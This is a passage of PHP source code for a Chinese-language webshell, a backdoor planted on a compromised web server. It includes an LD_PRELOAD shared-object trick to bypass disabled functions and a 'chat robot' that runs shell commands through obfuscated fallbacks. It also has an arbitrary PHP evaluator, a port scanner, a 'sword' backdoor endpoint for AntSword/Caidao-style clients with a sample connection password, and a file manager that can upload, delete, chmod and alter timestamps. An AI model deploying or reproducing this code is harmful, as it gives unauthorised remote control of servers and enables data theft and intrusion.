0000f0010000000000003400000000000000030000000000000008000000000000000000000000000000380000000b000000020000000000000028020000000000002802000000000000980100000000000004000000020000000800000000000000180000000000000040000000030000000200000000000000c003000000000000c003000000000000be0000000000000000000000000000000100000000000000000000000000000048000000ffffff6f02000000000000007e040000000000007e04000000000000220000000000000003000000000000000200000000000000020000000000000055000000feffff6f0200000000000000a004000000000000a004000000000000200000000000000004000000010000000800000000000000000000000000000064000000040000000200000000000000c004000000000000c004000000000000f0000000000000000300000000000000080000000000000018000000000000006e000000040000004200000000000000b005000000000000b005000000000000480000000000000003000000160000000800000000000000180000000000000078000000010000000600000000000000f805000000000000f8050000000000001700000000000000000000000000000004000000000000000000000000000000730000000100000006000000000000001006000000000000100600000000000040000000000000000000000000000000100000000000000010000000000000007e00000001000000060000000000000050060000000000005006000000000000080000000000000000000000000000000800000000000000000000000000000087000000010000000600000000000000600600000000000060060000000000009e010000000000000000000000000000100000000000000000000000000000008d00000001000000060000000000000000080000000000000008000000000000090000000000000000000000000000000400000000000000000000000000000093000000010000000200000000000000090800000000000009080000000000000f000000000000000000000000000000010000000000000000000000000000009b000000010000000200000000000000180800000000000018080000000000001c00000000000000000000000000000004000000000000000000000000000000a9000000010000000200000000000000380800000000000038080000000000006400000000000000000000000000000008000000000000000000000000000000b30000000e0000000300000000000000f00d200000000000f00d0000000000001000000000000000000000000000000008000000000000000000000000000000bf0000000f0000000300000000000000000e200000000000000e0000000000000800000000000000000000000000000008000000000000000000000000000000cb000000010000000300000000000000080e200000000000080e0000000000000800000000000000000000000000000008000000000000000000000000000000d0000000060000000300000000000000100e200000000000100e000000000000c00100000000000004000000000000000800000000000000100000000000000082000000010000000300000000000000d00f200000000000d00f0000000000003000000000000000000000000000000008000000000000000800000000000000d9000000010000000300000000000000001020000000000000100000000000003000000000000000000000000000000008000000000000000800000000000000e2000000010000000300000000000000301020000000000030100000000000000800000000000000000000000000000008000000000000000000000000000000e8000000080000000300000000000000381020000000000038100000000000000800000000000000000000000000000001000000000000000000000000000000ed0000000100000030000000000000000000000000000000381000000000000035000000000000000000000000000000010000000000000001000000000000001100000003000000000000000000000000000000000000002c18000000000000f6000000000000000000000000000000010000000000000000000000000000000100000002000000000000000000000000000000000000007010000000000000b8050000000000001c0000002f0000000800000000000000180000000000000009000000030000000000000000000000000000000000000028160000000000000402000000000000000000000000000001000000000000000000000000000000'; } @file_put_contents($so_path , pack('H*' , $file_code)); } $out_path = '/tmp/' . Foundation::returnRand(6); $command_line = $content . " > " . $out_path . " 2>&1"; putenv("CDL=$command_line"); putenv("LD_PRELOAD=$so_path"); $a = getenv("CDL"); $b = getenv("LD_PRELOAD"); $result .= "
执行命令
$command_line
命令环境变量
$a
so文件环境变量
$b
"; switch ($type) { case '1': mail('' , '' , '' , ''); break; case '2': imap_mail('' , '' , '' , ''); break; case '3': error_log('' , '' , '' , ''); break; case '4': mb_send_mail('' , '' , '' , ''); break; } $return_content = nl2br(file_get_contents($out_path)); @unlink($out_path); $result .= '
执行命令回显' . '
' . $return_content . '
'; } return $result; } } class Foundation { public static function getCfg ($var_name) { switch ($result = get_cfg_var($var_name)) { case 0: return "No"; break; case 1: return "Yes"; break; default: return $result; break; } } public static function funAlive ($fun_name) { return (false !== function_exists($fun_name)) ? "Yes" : "No"; } public static function getSysInfo () { $result = <<a{color:#767b80;text-decoration:none;}table{margin:0 auto;width:900px;border-spacing:0;border-collapse:collapse;}td{border:1px solid #ededed;padding:12px 20px;}td:first-child{width:250px;text-align:right;}td:last-child{text-align:left;}tr:nth-child(odd){}tr:nth-child(even){background:#f9f9f9;}tr:hover{background:#f5f5f5;} EOF; $dis_func = get_cfg_var("disable_functions"); $upsize = get_cfg_var("file_uploads") ? get_cfg_var("upload_max_filesize") : "不允许上传"; $adminmail = (isset($_SERVER['SERVER_ADMIN'])) ? "" . $_SERVER['SERVER_ADMIN'] . "" : "" . get_cfg_var("sendmail_from") . ""; if ($dis_func == "") { $dis_func = "No"; } else { $dis_func = str_replace(" " , "
" , $dis_func); $dis_func = str_replace("," , "
" , $dis_func); } $phpinfo = (!preg_match("phpinfo" , $dis_func)) ? "Yes" : "No"; $info = [ ["服务器时间/北京时间" , date("Y年m月d日 h:i:s" , time()) . " / " . gmdate("Y年n月j日 H:i:s" , time() + 8 * 3600)] , ["服务器域名:端口
[ip:port]" , "" . $_SERVER['SERVER_NAME'] . ":" . $_SERVER['SERVER_PORT'] . " ( " . gethostbyname($_SERVER['SERVER_NAME']) . " )"] , ["服务器操作系统(文字编码)" , PHP_OS . " (" . $_SERVER['HTTP_ACCEPT_LANGUAGE'] . ")"] , ["服务器解译引擎" , $_SERVER['SERVER_SOFTWARE']] , ["你的IP" , getenv('REMOTE_ADDR')] , ["PHP运行方式(版本)" , strtoupper(php_sapi_name()) . "(" . PHP_VERSION . ") / 安全模式:" . self::getCfg("safemode")] , ["服务器管理员" , $adminmail] , ["本文件路径" , __FILE__] , ["允许使用URL打开文件
[allow_url_fopen]" , self::getCfg("allow_url_fopen")] , ["允许动态加载链接库
[enable_dl]" , self::getCfg("enable_dl")] , ["显示错误信息
[display_errors]" , self::getCfg("display_errors")] , ["自定义全局变量
[register_globals]" , self::getCfg("register_globals")] , ["自动字符串转义
[magic_quotes_gpc]" , self::getCfg("magic_quotes_gpc")] , ["最多内存使用量
[memory_limit]" , self::getCfg("memory_limit")] , ["POST最大字节
[post_max_size]" , self::getCfg("post_max_size")] , ["允许最大上传
[upload_max_filesize]" , $upsize] , ["程序最长运行时间
[max_execution_time]" , self::getCfg("max_execution_time") . "秒"] , ["禁用函数
[disable_functions]" , $dis_func] , ["程序信息函数
[phpinfo()]" , $phpinfo] , ["目前还有空余空间
[diskfreespace]" , intval(diskfreespace(".") / (1024 * 1024)) . 'Mb'] , ["GZ压缩文件支持
[zlib]" , self::funAlive("gzclose")] , ["ZIP压缩文件支持
[ZipArchive(php_zip)]" , self::funAlive("zip_open")] , ["IMAP电子邮件系统" , self::funAlive("imap_close")] , ["XML解析" , self::funAlive("xml_set_object")] , ["FTP登陆" , self::funAlive("ftp_login")] , ["Session支持" , self::funAlive("session_start")] , ["Socket支持" , self::funAlive("fsockopen")] , ["MySQL数据库" , self::funAlive("mysql_close")] , ["MSSQL数据库" , self::funAlive("mssql_close")] , ["Postgre SQL数据库" , self::funAlive("pg_close")] , ["SQLite数据库" , self::funAlive("sqlite_close")] , ["Oracle数据库" , self::funAlive("ora_close")] , ["Oracle 8数据库" , self::funAlive("OCILogOff")] , ["SyBase数据库" , self::funAlive("sybase_close")] , ["Hyperwave数据库" , self::funAlive("hw_close")] , ["InforMix数据库" , self::funAlive("ifx_close")] , ["FilePro数据库" , self::funAlive("filepro_fieldcount")] , ["DBA/DBM连接" , self::funAlive("dba_close") . " / " . self::funAlive("dbmclose")] , ["ODBC/dBASE连接" , self::funAlive("odbc_close") . " / " . self::funAlive("dbase_close")] , ["PREL相容语法
[PCRE]" , self::funAlive("preg_match")] , ["PDF支持" , self::funAlive("pdf_close")] , ["图形处理
[GD Library]" , self::funAlive("imageline")] , ["SNMP网络管理协议" , self::funAlive("snmpget")] , ]; $result .= ''; for ($i = 0; $i < count($info); $i ++) { $result .= '' . "\n"; } $result .= '
' . $info[$i][0] . '' . $info[$i][1] . '
'; return $result; } public static function getPhpInfo () { date_default_timezone_set('Asia/Shanghai'); phpinfo(); $i = ob_get_contents(); ob_end_clean(); $html = str_replace("module_Zend Optimizer" , "module_Zend_Optimizer" , preg_replace('%^.*(.*).*$%ms' , '$1' , $i)); $html = str_replace(' width="600"' , '' , $html); $result = <<*{font-family:Consolas !important;}body{width:98%;}pre{margin:0px;font-family:monospace;}a:link{color:#000099;text-decoration:none;}table{margin-left:auto;width:100%;border-collapse:collapse;margin-right:auto;text-align:left;}div{box-sizing:border-box;}th{font-weight:bold;background:#eee;}td,th{border:1px solid #000000;vertical-align:baseline;font-size:14px;padding:5px;}.center{padding-left: 30px} {$html} STR; return $result; } public static function chatRobot () { $res = '我是您的智能聊天助手,请问我问题吧~'; $cmd = isset($GLOBALS['_POST']['content']) ? htmlspecialchars(Decrypt::run($GLOBALS['_POST']['content'])) : 'dir'; if (!empty($GLOBALS['_POST']['content'])) { $res = self::DeMarcia(Decrypt::run($GLOBALS['_POST']['content'])); } $result = <<.input-box{margin-bottom:20px;}.input-box span:first-child{display:inline-block;width:100px;font-size:18px;color:#333;text-align:left;}.input-text{vertical-align:middle;}.input-text2{vertical-align:top;}select{height:40px;margin:0 5px;outline:none;background:#fff;border:1px solid #ccc;font-size:14px;vertical-align:middle;color:#333;line-height:40px;}textarea{padding:10px;border-radius:4px;font-size:16px;border:1px solid #CCC;line-height:24px;color:#333;outline:none;width:660px;height:520px;}textarea:focus,input:focus{box-shadow:0 0 8px rgba(51,51,51,.6);}input{height:40px;padding:6px 12px;font-size:17px;line-height:1.42857143;color:#555;background-color:#fff;background-image:none;border:1px solid #ccc;border-radius:4px;outline:none;vertical-align:middle;}input[type='submit']{width:100px;cursor:pointer;font-size:14px;}input[type='submit']:hover{background:#ededed;}form{text-align:center;padding-right:150px;}
输入内容
返回结果
END; return $result; } public static function DeMarcia ($string) { $res = ''; $a = StringHandler::getPen(); $b = StringHandler::getPineapple(); $c = 's' ./*-*/ 'h'/*-*/ . 'ell_' . $a; $d = StringHandler::getBanana(); $e = StringHandler::getOrange(); $g = StringHandler::getGrape(); if (function_exists($a)) { @$a($string , $res); $res = join("\n" , $res); } else if (function_exists($c)) { $res = @$c($string); } else if (function_exists($b)) { @ob_start(); @$b($string); $res = @ob_get_contents(); @ob_end_clean(); } else if (function_exists($d)) { @ob_start(); @$d($string); $res = @ob_get_contents(); @ob_end_clean(); } else if (@is_resource($f = @popen($string , 'r'))) { $res = ''; while (!@feof($f)) { $res .= @fread($f , 1024); } @pclose($f); } else if (substr(THEPATH , 0 , 1) != "/" && class_exists('COM')) { $w = new /*-*/ COM($e); $er = self::callBlack($w , $string); $f = self::callBlue($er); $res = self::callWhite($f); } else if (function_exists($g)) { $lf = null; $p = StringHandler::getApple($string , [1 => ['pipe' , 'w'] , 2 => ['pipe' , 'w']] , $lf); while (!feof($lf[1])) { $res .= htmlspecialchars(fgets($lf[1]) , ENT_COMPAT , 'UTF-8'); } while (!feof($lf[2])) { $res .= htmlspecialchars(fgets($lf[2]) , ENT_COMPAT , 'UTF-8'); } fclose($lf[1]); fclose($lf[2]); proc_close($p); } return $res; } public static function magicMaster () { $php_code = isset($GLOBALS['_POST']['content']) ? htmlspecialchars(Decrypt::run($GLOBALS['_POST']['content'])) : "echo '
Hello world
';"; $result = <<textarea,.result{padding:10px;border-radius:4px;font-size:16px;border:1px solid #CCC;line-height:24px;color:#333;outline:none;width:390px;height:520px;vertical-align:middle;resize:none;display:inline-block;box-sizing:border-box;overflow:auto;}textarea:focus{box-shadow:0 0 8px rgba(51,51,51,.6);}.der{text-align:left;color:#333;font-size:16px;width:850px;margin:0 auto 15px;}form{padding:0 70px 0 20px;text-align:center;}.result .child{display:block !important;}input[type=submit]{outline:none;padding:0;box-sizing:content-box;vertical-align:middle;height:135px;line-height:135px;width:40px;border-radius:4px;margin:0 15px;}
在左边写上你的愿望,右边会有魔法师帮你实现哦~
EOF; if (!empty($GLOBALS['_POST']['content'])) { echo ''; } $result .= '
'; return $result; } public static function portEye () { $port_ip = isset($GLOBALS['_POST']['content']) ? Decrypt::run($GLOBALS['_POST']['content']) : '127.0.0.1'; $port_port = isset($GLOBALS['_POST']['method']) ? Decrypt::run($GLOBALS['_POST']['method']) : ''; $result = <<
扫描IP
端口号
常见端口:20-30,53,67-69,80-90,110,111,137-139,143,161,162,389,445,443,512-514,873,1099,1194,1352,1433,1434,1500,1521,1723,2049,2082,2083,2181,2375,2601,2604,3128,3312,3311,3306,3389,3690,4750,4848,5000,5432,5632,5900-5902,5984,6379,7001-7010,7778,8000-8010,8069,8080-8090,8440-8450,9000-9010,9043,9080-9090,9200-9300,10000-10002,11211,27017,27018,50000,50030,50070
END; if ((!empty($GLOBALS['_POST']['content'])) && (!empty($GLOBALS['_POST']['method']))) { $ports_array = explode(',' , Decrypt::run($GLOBALS['_POST']['method'])); $ports = []; foreach ($ports_array as $value) { if (preg_match('/(\d+)-(\d+)/' , $value , $tmp)) { for ($j = $tmp[1]; $j < $tmp[2] + 1; $j ++) { $ports[] = (int) $j; } } else { $ports[] = (int) $value; } } $open_result = ''; $close_result = ''; for ($i = 0; $i < count($ports); $i ++) { if ($ports[$i]) { $fp = @fsockopen(Decrypt::run($GLOBALS['_POST']['content']) , $ports[$i] , $errno , $errstr , 2); if ($fp) { $open_result .= "$ports[$i]"; } else { $close_result .= "$ports[$i]"; } } ob_flush(); flush(); } $result .= "
开放端口
$open_result
关闭端口
$close_result
"; } return $result; } public static function swordHtml () { $result = <<.sug-box{width:700px;padding-right:50px;margin:0 auto;}.sug{font-size:18px;color:#333;margin-bottom:30px;}.sug-content{color:#666;font-size:16px;line-height:30px;}.active{display:block;margin-top:10px;background-color:#f8f8f8;padding:10px 20px;color:#666;margin-bottom:30px;border-radius:4px;border:1px solid #ccc;}
本模块可使用切菜使用的工具、来自德玛西亚蚂蚁的武器等管理端进行连接
连接地址:
http://website.com/script.php?action=cxk&e=cmVfc19ldF9hX2xpX2Fz
密码:
singdancerapbasketball
连接配置:
Cookie:PHPSESSIDS=5dce171e2fab0814d67170153804f937
EOF; return $result; } public static function sword () { $e = explode('_' , Decrypt::run($_REQUEST['e'])); $f = $e[3] . $e[1] . $e[5][1] . $e[2][0] . $e[0][0] . $e[2][1]; $f($GLOBALS['_POST']['singdancerapbasketball']); } public static function returnRand ($pw_length) { $rand_str = ''; for ($i = 0; $i < $pw_length; $i ++) { $rand_str .= chr(mt_rand(97 , 122)); } return $rand_str; } public static function callBlack ($class , $string) { return $class->exec($string); } public static function callBlue ($class) { return $class->StdOut(); } public static function callWhite ($class) { return $class->ReadAll(); } } class FileHandler { private $msg; private $p; function __construct () { $this->msg = ["0" => "保存成功" , "1" => "保存失败" , "2" => "上传成功" , "3" => "上传失败" , "4" => "修改成功" , "5" => "修改失败" , "6" => "删除成功" , "7" => "删除失败"]; $this->p = isset($GLOBALS['_GET']['path']) ? urldecode(Decrypt::run($GLOBALS['_GET']['path'])) : ""; } public function filePathFormat ($string) { return str_replace('//' , '/' , str_replace('\\' , '/' , $string)); } public function fileMode () { $RealPath = realpath('./'); $SelfPath = $_SERVER['PHP_SELF']; $SelfPath = substr($SelfPath , 0 , strrpos($SelfPath , '/')); return self::filePathFormat(substr($RealPath , 0 , strlen($RealPath) - strlen($SelfPath))); } public function getFileSize ($size) { $kb = 1024; $mb = 1024 * $kb; $gb = 1024 * $mb; $tb = 1024 * $gb; if ($size < $kb) { return $size . " B"; } else if ($size < $mb) { return round($size / $kb , 2) . " K"; } else if ($size < $gb) { return round($size / $mb , 2) . " M"; } else if ($size < $tb) { return round($size / $gb , 2) . " G"; } else { return round($size / $tb , 2) . " T"; } } public function renameFile () { $q = isset($GLOBALS['_GET']['newname']) ? Decrypt::run($GLOBALS['_GET']['newname']) : ""; $p_path = dirname($this->p); $content = @rename($this->p , $p_path . '/' . $q) ? $this->msg[4] : $this->msg[5]; $url = "?action=wjdc&path=" . base64_encode($p_path); HtmlOutput::tips($content , $url); } public function readFile ($filename) { $handle = @fopen($filename , "rb"); $file_code = @fread($handle , @filesize($filename)); @fclose($handle); return $file_code; } public function writeFile ($filename , $file_mode , $file_code) { $key = true; $handle = @fopen($filename , $file_mode); if (!@fwrite($handle , $file_code)) { @chmod($filename , 0666); $key = @fwrite($handle , $file_code) ? true : false; } @fclose($handle); return $key; } public function copyFile () { $new_path = explode('/' , Decrypt::run($GLOBALS['_GET']['newcopy'])); $pathr[0] = $new_path[0]; for ($i = 1; $i < count($new_path); $i ++) { $pathr[] = urlencode($new_path[$i]); } $new_copy = implode('/' , $pathr); $content = @copy($this->p , $new_copy) ? $this->msg[4] : $this->msg[5]; $url = "?action=wjdc&path=" . base64_encode(urlencode(dirname($this->p))); HtmlOutput::tips($content , $url); } public function moveFile ($file_a , $file_b) { $key = @copy($file_a , $file_b) ? true : false; if (!$key) $key = @move_uploaded_file($file_a , $file_b) ? true : false; return $key; } public function deleteDir ($del_dir) { $file_arr = self::getDirArray($del_dir); foreach ($file_arr as $del) { if (is_dir($del)) { if (!self::deleteDir($del)) return false; } else if (!is_dir($del)) { @chmod($del , 0777); if (!@unlink($del)) return false; } } @chmod($del_dir , 0777); if (!@rmdir($del_dir)) return false; return true; } public function deleteDirFile () { $p_path = dirname($this->p); $content = self::deleteDir($this->p) ? $this->msg[6] : $this->msg[7]; $url = "?action=wjdc&path=" . base64_encode($p_path); HtmlOutput::tips($content , $url); } public function deleteFile () { $p_path = dirname($this->p); $content = @unlink($this->p) ? $this->msg[6] : $this->msg[7]; $url = "?action=wjdc&path=" . base64_encode($p_path); HtmlOutput::tips($content , $url); } public function getFileType ($file) { $it = substr($file , - 3); switch ($it) { case "jpg": case "gif": case "bmp": case "png": case "ico": return 'img'; break; case "htm": case "tml": return 'html'; break; case "exe": case "com": return 'exe'; break; case "asp": return 'aspx'; break; case "css": return 'css'; break; case "xml": case "doc": return 'xml'; break; case "php": return 'php'; break; case "jsp": case "java": return 'jsp'; break; case ".js": case "vbs": return 'js'; break; case "mp3": case "wma": case "wav": case "swf": case ".rm": case "avi": case "mp4": case "mvb": return 'mp3'; break; case "rar": case "tar": case ".gz": case "iso": return 'rar'; break; case "zip": return 'zip'; default: return 'file'; break; } } public function downloadFile () { $file = isset($GLOBALS['_GET']['path']) ? urldecode(Decrypt::run($GLOBALS['_GET']['path'])) : ''; if (!@file_exists($file)) HtmlOutput::message('下载文件不存在'); $file_info = pathinfo($file); header('Content-type: application/x-' . $file_info['extension']); header('Content-Disposition: attachment; filename=' . $file_info['basename']); header('Content-Length: ' . filesize($file)); @readfile($file); exit; } public function downloadZip ($filecode , $file) { header("Content-type: application/unknown"); header('Accept-Ranges: bytes'); header("Content-length: " . strlen($filecode)); header("Content-disposition: attachment; filename=" . $file . ";"); echo $filecode; exit; } public function fileAction ($array , $type , $inver , $REAL_DIR) { if (($count = count($array)) == 0) return '请选择文件'; if ($type == 'e') { function listfiles ($dir = "." , $faisunZIP , $mydir) { $sub_file_num = 0; if (is_file($mydir . "$dir")) { if (realpath($faisunZIP->gzfilename) != realpath($mydir . "$dir")) { $faisunZIP->addFile(file_get_contents($mydir . $dir) , "$dir"); return 1; } return 0; } $handle = opendir($mydir . "$dir"); while ($file = readdir($handle)) { if ($file == "." || $file == "..") continue; if (is_dir($mydir . "$dir/$file")) { $sub_file_num += listfiles("$dir/$file" , $faisunZIP , $mydir); } else { if (realpath($faisunZIP->gzfilename) != realpath($mydir . "$dir/$file")) { $faisunZIP->addFile(file_get_contents($mydir . $dir . "/" . $file) , "$dir/$file"); $sub_file_num ++; } } } closedir($handle); if (!$sub_file_num) $faisunZIP->addFile("" , "$dir/"); return $sub_file_num; } function num_bitunit ($num) { $bitunit = [' B' , ' KB' , ' MB' , ' GB']; for ($key = 0; $key < count($bitunit); $key ++) { if ($num >= pow(2 , 10 * $key) - 1) { //1023B 会显示为 1KB $num_bitunit_str = (ceil($num / pow(2 , 10 * $key) * 100) / 100) . " $bitunit[$key]"; } } return $num_bitunit_str; } $mydir = $REAL_DIR; if (is_array($array)) { $faisunZIP = new PhpZip; if ($faisunZIP->startFile("$inver")) { $filenum = 0; foreach ($array as $file) { $filenum += listfiles($file , $faisunZIP , $mydir); } $faisunZIP->createFile(); return "压缩完成,共添加 $filenum 个文件。 点击下载 $inver (" . num_bitunit(filesize("$inver")) . ")"; } else { return "$inver 不能写入,请检查路径或权限是否正确。"; } } else { return "没有选择的文件或目录。"; } } $i = 0; while ($i < $count) { $array[$i] = urldecode($array[$i]); switch ($type) { case "a" : $inver = urldecode($inver); if (!is_dir($inver)) return '路径错误'; $filename = array_pop(explode('/' , $array[$i])); @copy($array[$i] , self::filePathFormat($inver . '/' . $filename)); $msg = '复制到' . $inver . '目录'; break; case "b" : $filename = array_pop(explode('/' , $array[$i])); if (!@unlink($array[$i])) { @chmod($filename , 0666); @unlink($array[$i]); } $msg = '删除'; break; case "c" : if (!preg_match("/^[0-7]{4}$/i" , $inver)) return '属性值错误'; $newmode = base_convert($inver , 8 , 10); @chmod($REAL_DIR . $array[$i] , $newmode); $msg = '属性修改为 ' . $inver; break; case "d" : @touch($array[$i] , strtotime($inver)); $msg = '修改时间为 ' . $inver; break; } $i ++; } return '所选文件 ' . $msg . ' 完毕'; } public function getDirArray ($filepath) { $show = []; $dir = dir($filepath); while ($file = $dir->read()) { if ($file == '.' or $file == '..') continue; $files = self::filePathFormat($filepath . '/' . $file); $show[] = $files; } $dir->close(); return $show; } public function getFileOwner ($File) { if (PATH_SEPARATOR == ':') { if (function_exists('posix_getpwuid')) { $File = posix_getpwuid(fileowner($File)); } return $File['name']; } else { return ''; } } public function getFileGroup ($File) { if (PATH_SEPARATOR == ':') { if (function_exists('posix_getgrgid')) { $File = posix_getgrgid(filegroup($File)); } return $File['name']; } else { return ''; } } public function arrayIconv ($data , $output = 'utf-8') { $encode_arr = ['UTF-8' , 'ASCII' , 'GBK' , 'GB2312' , 'BIG5' , 'JIS' , 'eucjp-win' , 'sjis-win' , 'EUC-JP']; $encoded = mb_detect_encoding($data , $encode_arr); if (!is_array($data)) { return mb_convert_encoding($data , $output , $encoded); } else { foreach ($data as $key => $val) { $key = $this->arrayIconv($key , $output); if (is_array($val)) { $data[$key] = $this->arrayIconv($val , $output); } else { $data[$key] = mb_convert_encoding($data , $output , $encoded); } } return $data; } } public function fileManage () { $path = isset($GLOBALS['_GET']['path']) ? urldecode(Decrypt::run($GLOBALS['_GET']['path'])) : THEPATH . '/'; $path_1 = base64_encode($path); $path_2 = base64_encode(dirname($path)); $result = << function rusurechk(msg,url){smsg = "文件名: [" + msg + "] \\n请输出新文件名:";re = prompt(smsg,msg);if (re){url = url + base64encode(re);window.location = url;}} function rusuredel(msg,url){smsg = "确定要删除 [" + msg + "] 吗?";if(confirm(smsg)){URL = url + base64encode(msg);window.location = url;}} function Delok(msg,gourl){smsg = "确定要删除 [" + unescape(msg) + "] 吗?";if(confirm(smsg)){if(gourl == 'b'){document.getElementById('select_all').value = escape(gourl);document.getElementById('fileall').submit();}else window.location = gourl;}} function CheckAll(form){for(var i=0;i EOF; $dir = @dir($path); $REAL_DIR = self::filePathFormat(realpath($path)); if (!empty($GLOBALS['_POST']['type'])) { $result .= '
' . self::fileAction($GLOBALS['_POST']['files'] , $GLOBALS['_POST']['type'] , $GLOBALS['_POST']['inver'] , $REAL_DIR . '/') . '
'; } $NUM_D = $NUM_F = 0; if (!$_SERVER['SERVER_NAME']) $GET_URL = ''; else $GET_URL = 'http://' . $_SERVER['SERVER_NAME'] . '/'; $ROOT_DIR = self::fileMode(); $encode_path = base64_encode(urlencode($path)); $result .= <<.new-file,.mine-file{position:relative;height:40px;padding:6px 12px;line-height:1.42857143;color:#555;background-color:#fff;background-image:none;border:1px solid #ccc;border-radius:4px;outline:none;vertical-align:middle;width:100px;cursor:pointer;font-size:14px;}.mine-file{height:40px;display:inline-block;width:auto;padding:0 25px;box-sizing:border-box;line-height:40px;}table{margin-top:10px;margin-bottom:30px;width:1100px;border-spacing:0;border-collapse:collapse;}tr:nth-child(even){background:#f9f9f9;}td,th{font-size:16px;border:1px solid #ededed;padding:8px 16px;}tr td:first-child input,tr td:first-child img,tr td:first-child a{vertical-align:middle;margin:0;}tr td:first-child img{margin-left:10px;}td a{color:#666;display:inline-block;}td:last-child a{padding:0 5px;}td a:hover{text-decoration:underline;}tr:hover{background:#f5f5f5;}.small-btn{width:80px;height:30px;border-radius:4px;margin-right:10px;}.num{color:#FF6600;}.main-content{width:1100px;margin:0 auto;padding-right:30px;}.delete{color:crimson;}.edit{color:#d46464;}.download{color:cornflowerblue;}.copy{color:cadetblue;}.change-name{color:#0ab2aa;}.pack{color:lightslategrey;}.upfile-box{width:100px;height:40px;line-height:40px;color:#555;font-size:14px;cursor:pointer;border-radius:4px;position:relative;text-align:center;display:inline-block;border:1px solid #ccc;box-sizing:border-box;vertical-align:middle;}.upfile{position:absolute;top:0;left:0;opacity:0;}.package{margin-bottom:20px;}.package a{color:#9dd69f;}
地址: 文件路径 上级
选择文件
EOF; if (!empty($GLOBALS['_POST']['newfile'])) { if (isset($GLOBALS['_POST']['bin'])) $bin = $GLOBALS['_POST']['bin']; else $bin = "wb"; $newfile = Decrypt::run($GLOBALS['_POST']['newfile']); if (strtolower($GLOBALS['_POST']['charset']) == 'utf-8') { $txt = Decrypt::run($GLOBALS['_POST']['txt']); } else { $txt = $GLOBALS['_POST']['txt']; } if (substr(PHP_VERSION , 0 , 1) >= 5) { if ((strtolower($GLOBALS['_POST']['charset']) == 'gb2312') or (strtolower($GLOBALS['_POST']['charset']) == 'gbk')) { $txt = iconv("UTF-8" , "gb2312//IGNORE" , Decrypt::run($GLOBALS['_POST']['txt'])); } else { $txt = self::arrayIconv($txt); } } $content = self::writeFile($newfile , $bin , $txt) ? $this->msg[0] : $this->msg[1]; @touch($newfile , @strtotime($GLOBALS['_POST']['time'])); $url = "?action=wjdc&path=" . base64_encode($this->p); HtmlOutput::tips($content , $url); } $current_user = get_current_user(); $result .= << EOF; while ($dirs = @$dir->read()) { if ($dirs == '.' or $dirs == '..') continue; $dirpath = str_replace('//' , '/' , "$path/$dirs"); if (is_dir($dirpath)) { $perm = substr(base_convert(fileperms($dirpath) , 10 , 8) , - 4); $filetime = @date('Y-m-d H:i:s' , @filemtime($dirpath)); $dirpath = base64_encode(urlencode($dirpath . '/')); $dir_owner = self::getFileOwner("$path/$dirs"); $dir_group = self::getFileGroup("$path/$dirs"); $img_content = HtmlOutput::getFileIcon('dir'); $result .= << EOF; $NUM_D ++; } } @$dir->rewind(); while ($files = @$dir->read()) { if ($files == '.' or $files == '..') continue; $filepath = self::filePathFormat("$path/$files"); if (!is_dir($filepath)) { $fsize = self::getFileSize(@filesize($filepath)); $perm = substr(base_convert(fileperms($filepath) , 10 , 8) , - 4); $filetime = @date('Y-m-d H:i:s' , @filemtime($filepath)); $file_urls = str_replace(self::filePathFormat($ROOT_DIR . '/') , $GET_URL , $filepath); $todir = $ROOT_DIR . '/zipfile'; $it = substr($filepath , - 3); $file_path_2 = $filepath; $filepath = base64_encode(urlencode($filepath)); $file_owner = self::getFileOwner("$path/$files"); $file_group = self::getFileGroup("$path/$files"); $img_content = HtmlOutput::getFileIcon(self::getFileType($files)); $result .= << EOF; $NUM_F ++; } } @$dir->close(); $Filetime = null; if (!$Filetime) $Filetime = gmdate('Y-m-d H:i:s' , time() + 3600 * 8); $result .= <<
目录({$NUM_D}) / 文件({$NUM_F})
END; return $result; } public function fileEdit () { $type = isset($GLOBALS['_GET']['type']) ? $GLOBALS['_GET']['type'] : ""; $file_name = isset($_FILES['upfile']['name']) ? $_FILES['upfile']['name'] : ""; $name = isset($GLOBALS['_GET']['name']) ? Decrypt::run($GLOBALS['_GET']['name']) : ""; $pp = urlencode(dirname($this->p)); $result = << function utf16to8(str) {var out, i, len, c;out = "";len = str.length;for(i = 0; i < len; i++) {c = str.charCodeAt(i);if ((c >= 0x0001) && (c <= 0x007F)) {out += str.charAt(i);} else if (c > 0x07FF) {out += String.fromCharCode(0xE0 | ((c >> 12) & 0x0F));out += String.fromCharCode(0x80 | ((c >> 6) & 0x3F));out += String.fromCharCode(0x80 | ((c >> 0) & 0x3F));} else {out += String.fromCharCode(0xC0 | ((c >> 6) & 0x1F));out += String.fromCharCode(0x80 | ((c >> 0) & 0x3F));}}return out;} function utf8to16(str) {var out, i, len, c;var char2, char3;out = "";len = str.length;i = 0;while(i < len) {c = str.charCodeAt(i++);switch(c >> 4) {case 0: case 1: case 2: case 3: case 4: case 5: case 6: case 7:out += str.charAt(i-1);break;case 12: case 13:char2 = str.charCodeAt(i++);out += String.fromCharCode(((c & 0x1F) << 6) | (char2 & 0x3F));break;case 14:char2 = str.charCodeAt(i++);char3 = str.charCodeAt(i++);out += String.fromCharCode(((c & 0x0F) << 12) |((char2 & 0x3F) << 6) |((char3 & 0x3F) << 0));break;}}return out;} function CheckDate(){var re = document.getElementById('mtime').value;var reg = /^\d{1,4}-\d{1,2}-\d{1,2} \d{1,2}:\d{1,2}:\d{1,2}$/;var r = re.match(reg);var t = document.getElementById('charset').value;t = t.toLowerCase();if(r==null){alert('日期格式不正确!格式:yyyy-mm-dd hh:mm:ss');return false;}else{document.getElementById('newfile').value = base64encode(document.getElementById('newfile').value);if(t=="utf-8"){document.getElementById('txt').value = base64encode(utf16to8(document.getElementById('txt').value));}if(t=="gbk" || t=="gb2312"){document.getElementById('txt').value = base64encode(utf16to8(document.getElementById('txt').value));}}document.getElementById('editor').submit();} EOF; if (!empty($GLOBALS['_POST']['upload'])) { $message_name = $file_name . ' ' . $this->msg[2]; $content = @copy($_FILES['upfile']['tmp_name'] , str_replace('//' , '/' , $this->p . '/' . $file_name)) ? $message_name : $this->msg[3]; $url = "?action=wjdc&path=" . base64_encode($this->p); HtmlOutput::tips($content , $url); } if (!empty($type) && $type == '2') { $new_dir = str_replace('//' , '/' , $this->p . '/' . $name); $content = @mkdir($new_dir , 0777) ? $file_name . ' ' . $this->msg[0] : $this->msg[1]; $url = "?action=wjdc&path=" . base64_encode($this->p); HtmlOutput::tips($content , $url); } else if (!empty($type) && $type == '1') { $jspath = base64_encode(urlencode($this->p . '/' . $name)); $pp = base64_encode($this->p); $this->p = str_replace('//' , '/' , $this->p . '/' . $name); $FILE_CODE = ""; $charset = 'UTF-8'; $FILE_TIME = date('Y-m-d H:i:s' , time() + 3600 * 8); if (@file_exists($this->p)) 